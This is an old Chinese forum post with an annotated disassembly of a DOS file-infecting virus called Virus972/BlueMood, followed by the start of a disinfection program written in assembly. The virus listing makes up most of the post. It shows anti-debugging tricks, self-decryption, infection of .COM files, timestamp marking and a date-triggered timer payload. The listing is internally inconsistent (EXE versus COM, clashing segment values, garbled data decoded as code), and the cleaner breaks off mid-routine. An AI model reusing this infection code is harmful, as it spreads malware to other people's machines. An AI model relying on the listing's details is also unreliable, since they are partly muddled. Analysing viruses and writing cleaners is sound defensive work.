[这个贴子最后由ChinaFOX在 2003/10/09 08:24pm 第 2 次编辑]
以下说明:
3 该病毒只为教学用,任何人使用该病毒所做的事与本人无关。
2 该病毒为DOS下的。
5 该病毒不驻留内存。
4 该病毒值得看的地方是反跟踪技术和加密技术。
5 只感染EXE和Command.com文件,且只感染当前目录下第一个未感染的EXE文件,所以大家不用怕。
6 如果当前目录下没有未感染的EXE文件,就感染c:\Command.com文件。
7 后附杀毒程序。
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Virus972 By IG, ChinaFOX;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
4962:0100 E97102 JMP 0374
4962:033B 42 6C 75 65 4D 6F 6F 64 5B 48 61 72 6D 6C 65 73 73 5D ;病毒的开始
;'BlueMood[Harmless]'
4962:034D 03 93 9D 95 4D 97 7C 73 BD ....M.|s.
4962:0356 28 63 (c
4962:0358 29 47 65 6E 69 75 73 26 49 64 69 6F 74 02 48 4E )Genius&Idiot.HN
4962:0368 4E 55 2E 58 69 6E 58 69 61 6E 67 2E NU.XinXiang.
4962:0374 9C PUSHF ;病毒程序入口(开始处在33B)
4962:0375 51 PUSH CX ;本文件的长度
4962:0376 FA CLI ;禁止中断
4962:0377 E80000 CALL 037A
4962:037A 5B POP BX ;BX=IP=037A
4962:037B 81C34203 ADD BX,0342 ;?可能此后为缓冲区BX=6BC
4962:037F 8BF3 MOV SI,BX
4962:0381 81EE8103 SUB SI,0381 ;SI=33B指向病毒开始
4962:0385 BFDC00 MOV DI,00DC
4962:0388 90 NOP
4962:0389 03FB ADD DI,BX ;DI=798移动到病毒体以后
4962:038B B9CC03 MOV CX,03CC ;病毒长度(03CCh=972)
4962:038E 90 NOP
4962:038F FC CLD
4962:0390 F3 REPZ
4962:0391 A4 MOVSB ;移动自身到病毒体以后798处
4962:0392 8EDA MOV DS,DX ;DS=0 DI=B64
4962:0394 45 INC BP
4962:0395 83C26C ADD DX,+6C
4962:0398 B10A MOV CL,0A
4962:039A D3E5 SHL BP,CL ;BP=400 读取BIOS区数据
4962:039C FEC9 DEC CL ;CL=9
4962:039E EB21 JMP 03C1
4962:03A0 90EB
4962:03A2 8BF5 MOV SI,BP ;SI=4 DS=0(From 3CB)
4962:03A4 AD LODSW ;AX=DS:[SI]=0000:0004
4962:03A5 3104 XOR [SI],AX ;破坏单步中断
4962:03A7 EB25 JMP 03CE
4962:03A9 90EB
4926:03AB 8BC3 MOV AX,BX ;BX=06BC(From 3D6)
4926:03AD 50 PUSH AX ;缓冲区首址入栈
4926:03AE 8BEC MOV BP,SP ;SP=FFF8
4926:03B0 8BF3 MOV SI,BX
4926:03B2 81EEE202 SUB SI,02E2 ;SI=3DA
4926:03B6 06 PUSH ES
4926:03B7 1F POP DS ;DS=ES=0000
4926:03B8 8BFE MOV DI,SI ;SI=DI=3DA
4926:03BA B99CA7 MOV CX,A79C
4926:03BD EB37 JMP 03F6 ;进入逆指流解码区
4926:03BF 90EB
4962:03C1 8BFA MOV DI,DX ;DI=6C (From 39E)
4962:03C3 03FD ADD DI,BP ;DI=46C
4962:03C5 FEC9 DEC CL ;CL=8
4962:03C7 D3ED SHR BP,CL ;BP=4
4962:03C9 8B0D MOV CX,[DI] ;(0000:046C)CX=随机数
4962:03CB EBD5 JMP 03A2
4962:03CD EB
4962:03CE 83C606 ADD SI,+06 ;SI=0C (From 3A7)
4962:03D1 AD LODSW ;SI=0E
4962:03D2 3104 XOR [SI],AX ;破坏INT 3H中断向量
4962:03D4 330D XOR CX,[DI] ;随机数与随机数异或
4962:03D6 74D3 JZ 03AB
4962:03D8 EBE7 JMP 03C1
4962:03DA C342E2FAC1AAAC328BFEB90281EE8BF3 ;42--2
4962:03EA 0390B9000251E9B900818B4E ;用于逆指令流的数据
4926:03F6 AD LODSW ;15次后变成JMP 0400(From 3BD)
4926:03F7 50 PUSH AX
AX=08EB BX=06BC CX=A79C DX=006C SP=FFDA BP=FFF8 SI=03F8 DI=03F8
DS=4962 ES=4962 SS=4962 CS=4962 IP=03F6 NV UP EI PL NZ NA PE NC
4962:03F6 EB08 JMP 0400 ;08EB=50AD xor A79C xor FFDA
4926:03F8 33C1 XOR AX,CX ;CX=A79C
4926:03FA 33C4 XOR AX,SP
4926:03FC AB STOSW ;DI=2DA
4926:03FD EBF7 JMP 03F6 ;循环
4926:03FF EB
4962:0400 58 POP AX
4962:0401 FFE4 JMP SP ;SP=FFDC
AX=50AD BX=06BC CX=A79C DX=006C SP=FFDC BP=FFF8 SI=03F8 DI=03F8
DS=4962 ES=4962 SS=4962 CS=4962 IP=FFDC NV UP EI PL NZ NA PE NC
4962:FFDC 8B4E00 MOV CX,[BP+00] ;SS:FFF8=06BC
4962:FFDF 81E9B902 SUB CX,02B9
4962:FFE3 51 PUSH CX ;CX=403
4962:FFE4 B90003 MOV CX,0300 ;CX=768
4962:FFE7 90 NOP
4962:FFE8 8BF3 MOV SI,BX
4962:FFEA 81EEB902 SUB SI,02B9 ;SI=403H
4962:FFEE 8BFE MOV DI,SI ;对DS:0403-0703进行解密
4962:FFF0 AC LODSB
4962:FFF1 32C1 XOR AL,CL
4962:FFF3 AA STOSB
4962:FFF4 E2FA LOOP FFF0 ;解密源跳点之后的程序
AX=5044 BX=06BC CX=0000 DX=006C SP=FFDA BP=FFF8 SI=0703 DI=0703
DS=4962 ES=4962 SS=4962 CS=4962 IP=FFF6 NV UP EI PL NZ NA PE NC
4962:FFF6 C3 RET ;[SS]=4926 [SP]=0403 跳回源点
AX=5044 BX=06BC CX=0000 DX=006C SP=FFDC BP=FFF8 SI=0703 DI=0703
DS=4962 ES=4962 SS=4962 CS=4962 IP=0403 NV UP EI PL NZ NA PE NC
4962:0403 8BE5 MOV SP,BP
4962:0405 58 POP AX ;SS:BP处存着关键字AX=6BC
4962:0406 BF0001 MOV DI,0100
4962:0409 8A874700 MOV AL,[BX+0047] ;[BX+0047]=[0703]=7C
4962:040D 347C XOR AL,7C
4962:040F 3005 XOR [DI],AL ;[100]=E9
4962:0411 47 INC DI ;DI=101
4962:0412 8B874800 MOV AX,[BX+0048] ;[704]=D81B
4962:0416 357619 XOR AX,1976
4962:0419 3105 XOR [DI],AX ;恢复文件头的JMP XXXX
4962:041B 33C0 XOR AX,AX
4962:041D 8ED8 MOV DS,AX
4962:041F BE0400 MOV SI,0004
4962:0422 AD LODSW ;读INT 1H之IP
4962:0423 3104 XOR [SI],AX ;再次破坏INT 1H
4962:0425 BE0C00 MOV SI,000C
4962:0428 AD LODSW
4962:0429 3104 XOR [SI],AX ;破坏INT 3H
4962:042B 06 PUSH ES
4962:042C 1F POP DS ;DS=4962
4962:042D B93900 MOV CX,0039 ;57个字节
4962:0430 90 NOP
4962:0431 8BF3 MOV SI,BX ;BX=6BC
4962:0433 2BF1 SUB SI,CX ;SI=683
4962:0435 BFDC00 MOV DI,00DC
4962:0438 90 NOP
4962:0439 03FB ADD DI,BX ;DI=798
4962:043B F3 REPZ
4962:043C A4 MOVSB ;移动"Blu...xiang.."
4962:043D 8BF3 MOV SI,BX ;SI=6BC
4962:043F B430 MOV AH,30 ;取DOS版本号
4962:0441 CD21 INT 21
4962:0443 3C02 CMP AL,02
4962:0445 7703 JA 044A ;大于DOS2.0
4962:0447 E91602 JMP 0660 ;可能是退出
4962:044A B42F MOV AH,2F ;取磁盘缓冲区首址
4962:044C CD21 INT 21
4962:044E 899C4F00 MOV [SI+004F],BX ;[SI+004F]=[70B]
4962:0452 8C845100 MOV [SI+0051],ES ;保存地址[70D]
4962:0456 8BDE MOV BX,SI ;BX=6BC
4962:0458 BA9D00 MOV DX,009D
4962:045B 90 NOP
4962:045C 03D3 ADD DX,BX ;DX=759
4962:045E B41A MOV AH,1A ;设置DAT地址(在DS:DX)
4962:0460 CD21 INT 21 ;说明:程序开始时在PSP:0080处
4962:0462 83C634 ADD SI,+34
4962:0465 90 NOP
4962:0466 56 PUSH SI ;SI=6F0
4962:002C 52 49 43 3E RIC>
4962:0467 8E062C00 MOV ES,[002C] ;DS:[002C]=4952 环境块段址
4962:046B 33FF XOR DI,DI
4962:046D B98000 MOV CX,0080
4962:0470 5E POP SI ;SI=6F0
4962:0471 56 PUSH SI
4962:0472 AC LODSB
4962:0473 F2 REPNZ
4962:0474 AE SCASB ;是否'PATH=*.COM'
4962:0475 51 PUSH CX ;长度
4962:0476 B90400 MOV CX,0004
4962:0479 F3 REPZ
4962:047A A6 CMPSB ;环境块中有无'*.COM'
4962:047B E307 JCXZ 0484 ;有
4962:047D 59 POP CX ;长度
4962:047E E2F0 LOOP 0470 ;比较下一个串
4962:0480 5E POP SI ;6F0
4962:0481 E9DC01 JMP 0660 ;恢复并转向正常程序执行
4962:0484 59 POP CX ;有
4962:0485 5E POP SI ;?SI=6F0
4962:0486 89BF4D00 MOV [BX+004D],DI ;[6BC+4D]=[709]保存环境块长度
4962:048A BF5900 MOV DI,0059
4962:048D 90 NOP
4962:048E 03FB ADD DI,BX ;DI=715
4962:0490 89BF9900 MOV [BX+0099],DI ;[755]
4962:0494 EB33 JMP 04C9
4962:0496 83BC4D0000 CMP WORD PTR [SI+004D],+00 ;[742](From 4F0)
4962:049B 7503 JNZ 04A0
4962:049D E96701 JMP 0607
4962:04A0 8BBF9900 MOV DI,[BX+0099] ;[755]
4962:04A4 8BB74D00 MOV SI,[BX+004D] ;[709]
4962:002C 52 49 43 3E RIC>
4962:04A8 8E1E2C00 MOV DS,[002C] ;DS=4952;
4962:04AC AC LODSB
4962:04AD 3C3B CMP AL,3B ;';' ?':'
4962:04AF 7409 JZ 04BA ;?换驱
4962:04B1 3C00 CMP AL,00
4962:04B3 7403 JZ 04B8 ;?结束
4962:04B5 AA STOSB
4962:04B6 EBF4 JMP 04AC
4962:04B8 33F6 XOR SI,SI ;AL=0
4962:04BA 06 PUSH ES
4962:04BB 1F POP DS
4962:04BC 89B74D00 MOV [BX+004D],SI ;[709]
4962:04C0 807DFF5C CMP BYTE PTR [DI-01],5C ;'\'
4962:04C4 7403 JZ 04C9
4962:04C6 B05C MOV AL,5C
4962:04C8 AA STOSB
4962:04C9 89BF9B00 MOV [BX+009B],DI ;[757]=715(Jmp From 494)
4962:04CD 8BF3 MOV SI,BX
4962:04CF 83C639 ADD SI,+39 ;SI=6BC+39=6F5
4962:04D2 90 NOP
4962:04D3 1E PUSH DS
4962:04D4 07 POP ES
4962:04D5 B90600 MOV CX,0006 ;'*.COM',0
4962:04D8 F3 REPZ ;DI=715
4962:04D9 A4 MOVSB ;传送"*.COM",0
4962:04DA 8BF3 MOV SI,BX ;SI=6BC
4962:04DC B44E MOV AH,4E ;查找第一个匹配文件
4962:04DE 8B979900 MOV DX,[BX+0099] ;DS:DX(=755)为ASCZ串
4962:04E2 B90300 MOV CX,0003 ;属性:隐藏并只读
4962:04E5 CD21 INT 21
4962:04E7 EB05 JMP 04EE
4962:04E9 90 NOP
4962:04EA B44F MOV AH,4F ;查找下一个匹配文件
4962:04EC CD21 INT 21
4962:04EE 7302 JNB 04F2 ;若有错(From 4E7)
4962:04F0 EBA4 JMP 0496 ;
4962:04F2 8B87B300 MOV AX,[BX+00B3] ;打开有错[7F6](From 4EE)
4962:04F6 241E AND AL,1E ;
4962:04F8 3C1E CMP AL,1E
4962:04FA 74EE JZ 04EA ;如果不符合
4962:04FC 83BFB7000D CMP WORD PTR [BX+00B7],+0D ;[773]
4962:0501 72E7 JB 04EA
4962:0503 81BFB70000F0 CMP WORD PTR [BX+00B7],F000 ;[773]
4962:0509 77DF JA 04EA
4962:050B BE4000 MOV SI,0040
4962:050E 90 NOP
4962:050F 03F3 ADD SI,BX ;SI=6FC
4962:0511 BFBB00 MOV DI,00BB
4962:0514 90 NOP
4962:0515 03FB ADD DI,BX ;DI=777
4962:0517 B90700 MOV CX,0007
4962:051A F3 REPZ
4962:051B A6 CMPSB ;与'COMMAND'比较
4962:051C 0BC9 OR CX,CX
4962:051E 74CA JZ 04EA ;查找下一个文件
4962:0520 8BF3 MOV SI,BX
4962:0522 B82435 MOV AX,3524 ;取INT 24H中断向量
4962:0525 CD21 INT 21
4962:0527 06 PUSH ES
4962:0528 53 PUSH BX ;保存入栈
4962:0529 8BDE MOV BX,SI
4962:052B 1E PUSH DS
4962:052C 07 POP ES
4962:052D BA3100 MOV DX,0031
4962:0530 03D3 ADD DX,BX ;DS:DX=4962:06ED
4962:0532 B82425 MOV AX,2524 ;设置INT 24H中断向量
4962:0535 CD21 INT 21 ;其内容是使AL=0
4962:0537 8BBF9B00 MOV DI,[BX+009B] ;[757]
4962:053B 81C6BB00 ADD SI,00BB ;SI=6BC+BB=777
4962:053F AC LODSB
4962:0540 AA STOSB
4962:0541 3C00 CMP AL,00
4962:0543 75FA JNZ 053F
4962:0545 B80043 MOV AX,4300 ;CX:0只读1隐藏2系统3卷标4目录
4962:0548 8B979900 MOV DX,[BX+0099] ;ASCZ<==[755]
4962:054C CD21 INT 21 ;取得文件属性
4962:054E 898F5700 MOV [BX+0057],CX ;[713]保存文件属性
4962:0552 B80143 MOV AX,4301 ;DS:DX为ASCZ串
4962:0555 B92000 MOV CX,0020 ;?保留 ?作标记
4962:0558 CD21 INT 21 ;设置文件属性
4962:055A B8023D MOV AX,3D02 ;以读写方式打开
4962:055D CD21 INT 21
4962:055F 7303 JNB 0564 ;成功
4962:0561 E98D00 JMP 05F1 ;失败则恢复属性及运行显示部分
4962:0564 8BF3 MOV SI,BX ;
4962:0566 8BD8 MOV BX,AX ;文件代号
4962:0568 B80057 MOV AX,5700 ;取得文件日期和时间
4962:056B CD21 INT 21 ;BX:句柄CX:时间DX:日期
4962:056D 898C5300 MOV [SI+0053],CX ;[70F]
4962:0571 89945500 MOV [SI+0055],DX ;[711]
4962:0575 B43F MOV AH,3F ;从文件中读取
4962:0577 B90300 MOV CX,0003
4962:057A BAA404 MOV DX,04A4 ;DS:DX缓冲区
4962:057D 90 NOP
4962:057E 03D6 ADD DX,SI ;?DX=6BC+4A4=B60
4962:0580 CD21 INT 21 ;BX:句柄
4962:0582 7256 JB 05DA ;失败则恢复时间日期并关闭
4962:0584 3D0300 CMP AX,0003
4962:0587 7551 JNZ 05DA ;若没读成功(或长度小于3Byte)
4962:0589 33C9 XOR CX,CX
4962:058B 33D2 XOR DX,DX
4962:058D B80242 MOV AX,4202 ;将文件指针移到文件未尾
4962:0590 CD21 INT 21
4962:0592 7246 JB 05DA ;失败
4962:0594 8BC8 MOV CX,AX ;保存文件长度
4962:0596 053600 ADD AX,0036 ;AX指向病毒入口(前36为Blue...)
4962:0599 89844B00 MOV [SI+004B],AX ;[708]
4962:059D 56 PUSH SI ;SI=6BC
4962:059E 81C6A504 ADD SI,04A5 ;
4962:05A2 357619 XOR AX,1976
4962:05A5 3104 XOR [SI],AX
4962:05A7 4E DEC SI
4962:05A8 803495 XOR BYTE PTR [SI],95
4962:05AB 5E POP SI
4962:05AC B9CC03 MOV CX,03CC ;972
4962:05AF 90 NOP
4962:05B0 BADC00 MOV DX,00DC
4962:05B3 90 NOP
4962:05B4 03D6 ADD DX,SI ;DS:DX:缓冲区
4962:05B6 B440 MOV AH,40 ;写文件
4962:05B8 CD21 INT 21
4962:05BA 721E JB 05DA ;关闭退出
4962:05BC 3DCC03 CMP AX,03CC
4962:05BF 90 NOP
4962:05C0 7518 JNZ 05DA ;是否写了972Byte
4962:05C2 33C9 XOR CX,CX
4962:05C4 33D2 XOR DX,DX
4962:05C6 B80042 MOV AX,4200 ;指针移到文件开始处
4962:05C9 CD21 INT 21
4962:05CB 720D JB 05DA ;不成功
4962:05CD B90300 MOV CX,0003 ;字节数
4962:05D0 BA4A00 MOV DX,004A
4962:05D3 90 NOP
4962:05D4 03D6 ADD DX,SI ;DS:DX缓冲区
4962:05D6 B440 MOV AH,40 ;写文件 JMP XXXX
4962:05D8 CD21 INT 21
4962:05DA 8B8C5300 MOV CX,[SI+0053] ;旧时间
4962:05DE 8B945500 MOV DX,[SI+0055] ;旧日期
4962:05E2 83C91E OR CX,+1E
4962:05E5 83E1FE AND CX,-02 ;CX:新时间==>感染标志
4962:05E8 B80157 MOV AX,5701 ;设置文件日期和时间
4962:05EB CD21 INT 21
4962:05ED B43E MOV AH,3E ;关闭文件
4962:05EF CD21 INT 21
4962:05F1 8B8C5700 MOV CX,[SI+0057] ;恢复原属性[713]
4962:05F5 8B949900 MOV DX,[SI+0099] ;DS:DX(=755)为ASCZ串
4962:05F9 B80143 MOV AX,4301 ;恢复文件属性
4962:05FC CD21 INT 21
4962:05FE 5A POP DX
4962:05FF 1F POP DS
4962:0600 B82425 MOV AX,2524 ;恢复INT 24H中断向量
4962:0603 CD21 INT 21
4962:0605 06 PUSH ES
4962:0606 1F POP DS
4962:0607 8B944F00 MOV DX,[SI+004F] ;[70B](From49D)
4962:060B 8E9C5100 MOV DS,[SI+0051] ;DS:DX(=70D)为DAT地址
4962:060F B41A MOV AH,1A ;恢复磁盘传输DAT地址
4962:0611 CD21 INT 21
4962:0613 06 PUSH ES
4962:0614 1F POP DS
4962:0615 B42A MOV AH,2A ;取得系统日期
4962:0617 CD21 INT 21 ;CX:年
4962:0619 80FE04 CMP DH,04 ;DH:4月
4962:061C 7217 JB 0635
4962:061E 7705 JA 0625
4962:0620 80FA0D CMP DL,0D ;DL:13日
4962:0623 7210 JB 0635
4962:0625 80FE07 CMP DH,07 ;7月
4962:0628 770B JA 0635
4962:062A 7205 JB 0631
4962:062C 80FA0C CMP DL,0C ;DL:12日
4962:062F 7704 JA 0635
4962:0631 3C05 CMP AL,05 ;AL:星期五(DOS1,10+)
4962:0633 7404 JA 0639
4962:0635 3C06 CMP AL,06 ;星期六
4962:0637 7527 JNZ 0660
4962:0639 B42C MOV AH,2C ;取得系统时间
4962:063B CD21 INT 21
4962:063D 81F90D10 CMP CX,100D ;CH:时 CL:分
4962:0641 721D JB 0660
4962:0643 8BDE MOV BX,SI
4962:0645 B81000 MOV AX,0010
4962:0648 8EC0 MOV ES,AX
4962:064A BF0301 MOV DI,0103
4962:064D B93100 MOV CX,0031 ;49个字节
4962:0650 F3 REPZ
4962:0651 A4 MOVSB ;移到0000:0203处
4962:0652 1E PUSH DS
4962:0653 07 POP ES
4962:0654 8ED8 MOV DS,AX ;DS=0010
4962:0656 BA0501 MOV DX,0105 ;DS:DX新中断
4962:0659 B81C25 MOV AX,251C ;设置INT ICH系统时钟中断
4962:065C CD21 INT 21 ;于0000:0205处(即INT 80H-9CH)
4962:065E 06 PUSH ES
4962:065F 1F POP DS
4962:0660 B92F03 MOV CX,032F ;815 ?退出
4962:0663 90 NOP
4962:0664 8BFB MOV DI,BX ;BX=6BC
4962:0666 81EF8103 SUB DI,0381 ;DI=33B SI=6BC
4962:066A F3 REPZ
4962:066B AA STOSB ;可能是自毁程序
4962:066C 33DB XOR BX,BX
4962:066E 33D2 XOR DX,DX
4962:0670 33F6 XOR SI,SI
4962:0672 33FF XOR DI,DI
4962:0674 33ED XOR BP,BP ;恢复原程序环境
4962:0676 59 POP CX ;CX=本文长度(程序开头之入栈)
4962:0677 81E9CC03 SUB CX,03CC ;CX=原文件长度23B
4962:067B 9D POPF ;(本文开始处之寄入栈)
4962:067C B80001 MOV AX,0100
4962:067F 50 PUSH AX
4962:0680 33C0 XOR AX,AX
4962:0682 C3 RET ;转向????:0100(转正常程序)
4962:0680 42 6C 75 65 4D-6F 6F 64 5B 48 61 72 6D BlueMood[Harm
4962:0690 6C 65 73 73 5D less]
4962:0695 03939D95 ADD DX,[BP+DI+959D]
4962:0699 4D DEC BP
4962:069A 97 XCHG DI,AX
4962:069B 7C73BD JL 0710
4962:0690 28 63 (c
4962:06A0 29 47 65 6E 69 75 73 26-49 64 69 6F 74 02 48 4E )Genius&Idiot.HN
4962:06B0 4E 55 2E 58 69 6E 58 69-61 6E 67 2E NU.XinXiang.
;可能此后为一缓冲区
4962:06BC D01A RCR BYTE PTR [BP+SI],1
4962:06BE 2E CS:
4962:06BF FF0E0301 DEC WORD PTR [0103]
4962:06C3 2E CS:
4962:06C4 833E030100 CMP WORD PTR [0103],+00
4962:06C9 7521 JNZ 06EC
4962:06CB 50 PUSH AX ;可能是新中断开始
4962:06CC 53 PUSH BX
4962:06CD 1E PUSH DS ;DS:DX文件控制块(FCB)首址
4962:06CE B40F MOV AH,0F ;用FCB打开文件
4962:06D0 CD10 INT 10
4962:06D2 3C03 CMP AL,03 ;?AL=0成功AL=FF不成功
4962:06D4 750C JNZ 06E2
4962:06D6 B800B8 MOV AX,B800
4962:06D9 8ED8 MOV DS,AX ;显示缓冲区首址
4962:06DB 33DB XOR BX,BX
4962:06DD B8031C MOV AX,1C03 ;蓝底褐字心形图案
4962:06E0 8907 MOV [BX],AX ;在屏幕左上角显示
4962:06E2 2E CS:
4962:06E3 C7060301D01A MOV WORD PTR [0103],1AD0 ;可能是传染标志
4962:06E9 1F POP DS
4962:06EA 5B POP BX
4962:06EB 58 POP AX
4962:06EC CF IRET ;新中断结束
4962:06ED 32C0 XOR AL,AL ;新INT 24H中断
4962:06EF CF IRET ;新中断结束
4962:06F0 50 41 54 48 3D ;'PATH='
4962:06F5 2A 2E 43 4F 4D 00 ;'*.COM',0 (ASCZ)
4962:06FB 00 43 4F 4D 4D ;0,'COMMAND'
4962:0703 7C ;数据(From 4962:0409):原文件头jmp xxxx
4962:0704 D81B ;数据(From 4962:0412):注:此处已加密
4962:0706 E9 SBB BP,CX
4962:0707 F4 HLT
;屯屯屯屯屯屯屯屯屯屯屯屯统绦蚪崾屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯
4962:0708 74 ;长度+36 (From 599)
4962:0709 0780 ;环境块长度(From 486)
4962:070B 3E96 ;保存磁盘传输偏址处(From 44E)
4962:070D 0E00 ;保存磁盘传输段址处(From 452)
4962:070F 7401 ;文件时间
4962:0711 46FF ;文件日期
4962:0713 FF46 ;保存文件属性
4962:0714 F4 INC WORD PTR [BP-0C]
4962:0715 EB03895EF4E9 ;存'*.COM',0(From 4D8)
4962:071B 7F00 JMP 079C
4962:071D 895EF4 MOV [BP-0C],BX
4962:0720 85DB TEST BX,BX
4962:0722 7C46 JL 076A
4962:0724 89F2 MOV DX,SI
4962:0726 2B56F4 SUB DX,[BP-0C]
4962:0729 83FA01 CMP DX,+01
4962:072C 7E18 JLE 0746
4962:072E 8B46F4 MOV AX,[BP-0C]
4962:0731 40 INC AX
4962:0732 8B5E0E MOV BX,[BP+0E]
4962:0735 01C3 ADD BX,AX
4962:0737 1E PUSH DS
4962:0738 53 PUSH BX
4962:0739 8B5E0E MOV BX,[BP+0E]
4962:073C 035EF4 ADD BX,[BP-0C]
4962:073F 1E PUSH DS
4962:0740 53 PUSH BX
4962:0741 4A DEC DX
4962:0742 52 PUSH DX
4962:0743 E81E17 CALL 1E64
4962:0746 89F0 MOV AX,SI
4962:0748 2B46F4 SUB AX,[BP-0C]
4962:074B 85C0 TEST AX,AX
4962:074D 7E1B JLE 076A
4962:074F 4E DEC SI
4962:0750 EB18 JMP 076A
4962:0752 8B76F4 MOV SI,[BP-0C]
4962:0755 EB13 ;DI=715(From 490)另要查找的文件名串在此存(From 4DE)
4962:0757 31F6 ;保存DI=715(From 4C9)
;磁盘传输地址FCB结构(From 45E)
4962:0759 EB ;文件所在驱动器
4962:075A 07C746F40000EB3A ;文件名
4962:0762 8976F4 ;扩展名
4962:0765 EB35 ;文件当前块
4962:0767 E8CA ;文件当前长度
4962:0769 B0EB30C4 ;文件长度
4962:076D 1EAA ;文件日期
4962:076F 0726837F20007E2226C4 ;由系统设置
4962:0779 7F ;顺序读前设置
4962:070A 1C268B05 ;随机读前设置(存"COMMAND" From 51B)
4962:077E 26 ES:
4962:077F 8B5502 MOV DX,[DI+02]
4962:0782 83C00A ADD AX,+0A
4962:0785 52 PUSH DX
4962:0786 50 PUSH AX
4962:0787 8E06AC21 MOV ES,[21AC]
4962:078B 26 ES:
4962:078C C47F1C LES DI,[BX+1C]
4962:078F 26 ES:
4962:0790 C41D LES BX,[DI]
4962:0792 26 ES:
4962:0793 FF7708 PUSH [BX+08]
4962:0796 E8 5F
4962:0798 42 6C 75 65 4D-6F 6F 64 5B 48 61 72 6D BlueMood[Harm
4962:07A5 6C 65 73 73 5D 03 93 9D-95 4D 97 7C 73 BD 28 63 less]....M.|s.(c
4962:07B5 29 47 65 6E 69 75 73 26-49 64 69 6F 74 02 48 4E )Genius&Idiot.HN
4962:07C5 4E 55 2E 58 69 6E 58 69-61 6E 67 2E NU.XinXiang.
;(Move here From 43C)
4962:07D1 9C PUSHF
4962:07D2 51 PUSH CX
4962:07D3 90 NOP
4962:07D4 E80000 CALL 07D7
4962:07D7 5B POP BX
4962:0100 E9 71 02 00 ;数据(From 40F)
4962:002C 52 49 43 3E RIC>
;(From 467)
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Kill972 By 286, ChinaFOX;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
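CODE SEGMENT
        org     100h
        assume  cs:CODE,ds:CODE,es:CODE,ss:CODE
;-----------------------------------------------------------------------
; Kill972 - strips the 972-byte "BlueMood" appender from one .COM file.
; Target: 8086 real mode, DOS .COM (single segment, SP near 0FFFEh).
;
; Infected-file layout the tool relies on (taken from the listing above):
;   [0..2]          JMP into the virus (first byte E9h)
;   [len-972..]     virus body, beginning with the text 'BlueMood'
;   [len-4]         host byte 0, encrypted: restore by XOR with (byte XOR 7Ch)
;   [len-3..len-2]  host bytes 1-2, encrypted: restore by XOR with (word XOR 1976h)
;   [len-1]         E9h
; The restore is the same pair of XORs the virus performs on the file
; header at 0409-0419 in the listing.
;
; Cleaning: read the whole file into Buffer, undo the two XORs on
; bytes 0-2, then re-create the file with only the first len-972 bytes.
; The original date/time cannot be recovered and is not restored; the
; original attributes are saved, cleared for the rewrite and put back.
; Messages go to stdout; the exit code is always 0.
;
; Buffer is the rest of the 64 KiB segment, so the read is bounded by
; BUF_LIMIT - offset Buffer to keep it away from the stack; files that
; do not fit are rejected rather than allowed to wrap over code/stack.
;-----------------------------------------------------------------------
SIG_BL      equ     6c42h               ; 'Bl' as a little-endian word
SIG_UE      equ     6575h               ; 'ue'
HDR_KEY     equ     7ch                 ; key for host byte 0
JMP_KEY     equ     1976h               ; key for host bytes 1-2
JMP_OPCODE  equ     0e9h
BUF_LIMIT   equ     0fe00h              ; highest offset a read may reach; leaves 512 bytes for the stack

MAIN    PROC NEAR
        jmp     begin
MSG0    db      'Please Input FileName:$'
FNAME   db      50                      ; INT 21h/0Ah buffer: maximum length
        db      0                       ; length actually typed (filled by DOS)
        db      50 dup (0)              ; characters, terminated by 0Dh
MSG1    db      0dh,0ah,'No Virus in file!',0dh,0ah,'$'
MSG2    db      0dh,0ah,'Find Virus!',0dh,0ah,'$'
MSG3    db      0dh,0ah,'Kill Successfully!',0dh,0ah,'$'
ERROR   db      0dh,0ah,'File Not Found!',0dh,0ah,'$'
MSG4    db      0dh,0ah,'Read Error!',0dh,0ah,'$'
MSG5    db      0dh,0ah,'Write Error!',0dh,0ah,'$'
MSG6    db      0dh,0ah,'File Too Large!',0dh,0ah,'$'
HANDLE  dw      0                       ; handle of the infected file while it is open
NUMB1   dw      0                       ; file length
NUMB2   dw      0                       ; host length = NUMB1 - VirusLength
ATTR    dw      0                       ; original attributes, restored on every path through `done`
VirusLength dw  972

; DISPSTR - print a '$'-terminated string with INT 21h/09h. Clobbers AX, DX.
DISPSTR MACRO ADDR
        lea     dx,ADDR
        mov     ah,9
        int     21h
        ENDM

begin:  DISPSTR MSG0
        mov     ah,0ah                  ; buffered keyboard input
        lea     dx,FNAME
        int     21h
        lea     bx,FNAME+1
tail0:  inc     bx                      ; scan for the terminating CR
        cmp     byte ptr [bx],0dh
        jnz     tail0
        mov     byte ptr [bx],0         ; CR -> NUL: ASCIIZ name at FNAME+2

        mov     ax,4300h                ; get attributes; also proves the file exists
        lea     dx,FNAME+2
        int     21h
        jc      er
        mov     ATTR,cx
        mov     ax,4301h                ; clear attributes so a read-only host can be rewritten
        xor     cx,cx
        int     21h                     ; if this fails the open below reports it

        mov     ax,3d02h                ; open read/write
        lea     dx,FNAME+2
        int     21h
        jc      er1
        mov     bx,ax
        mov     HANDLE,ax

        mov     ax,4202h                ; seek to end: DX:AX = file size
        xor     cx,cx
        xor     dx,dx
        int     21h
        jc      rderr
        or      dx,dx                   ; >= 64 KiB: neither a .COM nor something Buffer can hold
        jnz     big
        mov     cx,BUF_LIMIT
        sub     cx,offset Buffer        ; CX = bytes available between Buffer and the stack reserve
        cmp     ax,cx
        ja      big
        cmp     ax,VirusLength          ; no longer than the virus: cannot carry it
        jbe     no1
        mov     NUMB1,ax
        sub     ax,VirusLength
        mov     NUMB2,ax

        mov     ax,4200h                ; back to offset 0
        xor     cx,cx
        xor     dx,dx
        int     21h
        mov     ah,3fh                  ; read the whole file into Buffer
        mov     cx,NUMB1
        lea     dx,Buffer
        int     21h
        jc      rderr
        cmp     ax,NUMB1                ; short read is treated as a read error
        jnz     rderr
        mov     ah,3eh                  ; the handle is not needed any more
        int     21h
        jmp     scan

; Trampolines: short conditional jumps above cannot reach the handlers.
no1:    jmp     no
er:     jmp     err
er1:    jmp     err1
big:    jmp     toobig
rderr:  jmp     readerr

scan:   lea     di,Buffer
        add     di,NUMB1
        dec     di                      ; DI -> last byte of the file
        cmp     word ptr [di-971],SIG_BL   ; 'Bl' at virus offset 0
        jnz     nov
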